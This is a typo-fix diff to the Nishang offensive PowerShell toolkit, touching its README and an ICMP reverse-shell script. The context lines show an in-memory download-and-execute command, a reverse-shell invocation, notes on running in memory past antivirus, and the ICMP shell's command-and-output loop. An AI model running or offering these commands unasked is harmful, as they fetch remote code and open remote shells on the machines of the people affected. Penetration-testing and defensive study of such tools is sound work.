diff --git a/README.md b/README.md
index 04f5c9e..28c3c79 100644
--- a/README.md
+++ b/README.md
@@ -36,7 +36,7 @@ PS C:\nishang> Get-Help Get-WLAN-Keys -Full
 ``` #### Anti Virus
-Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
+Nishang scripts are flagged by many Anti Viruses as malicious. The scripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
 Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
@@ -48,7 +48,7 @@ powershell iex (New-Object Net.WebClient).DownloadString('http://
 Method 2. Use the `-encodedcommand` (or `-e`) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) `"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"`.
-Encode the scrript using Invoke-Encode from Nishang:
+Encode the script using Invoke-Encode from Nishang:
 ```powershell PS C:\nishang> . \nishang\Utility\Invoke-Encode
diff --git a/Shells/Invoke-PowerShellIcmp.ps1 b/Shells/Invoke-PowerShellIcmp.ps1
index 0ecce7c..8954480 100644
--- a/Shells/Invoke-PowerShellIcmp.ps1
+++ b/Shells/Invoke-PowerShellIcmp.ps1
@@ -2,7 +2,7 @@ function Invoke-PowerShellIcmp
 { <# .SYNOPSIS
-Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.
+Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.
 .DESCRIPTION This script can receive commands from a server, execute them and return the result to the server using only ICMP.
@@ -16,7 +16,7 @@ The IP address of the server/listener to connect to.
 Time in seconds for which the script waits for a command from the server. Default is 5 seconds. .PARAMETER BufferSize
-The size of output Buffer. Defualt is 128.
+The size of output buffer. Default is 128.
 .EXAMPLE # sysctl -w net.ipv4.icmp_echo_ignore_all=1
@@ -78,7 +78,7 @@ https://github.com/samratashok/nishang
 $index = [math]::floor($sendbytes.length/$BufferSize) $i = 0
-#Fragmant larger output into smaller ones to send to the server.
+#Fragment larger output into smaller ones to send to the server.
 if ($sendbytes.length -gt $BufferSize) { while ($i -lt $index )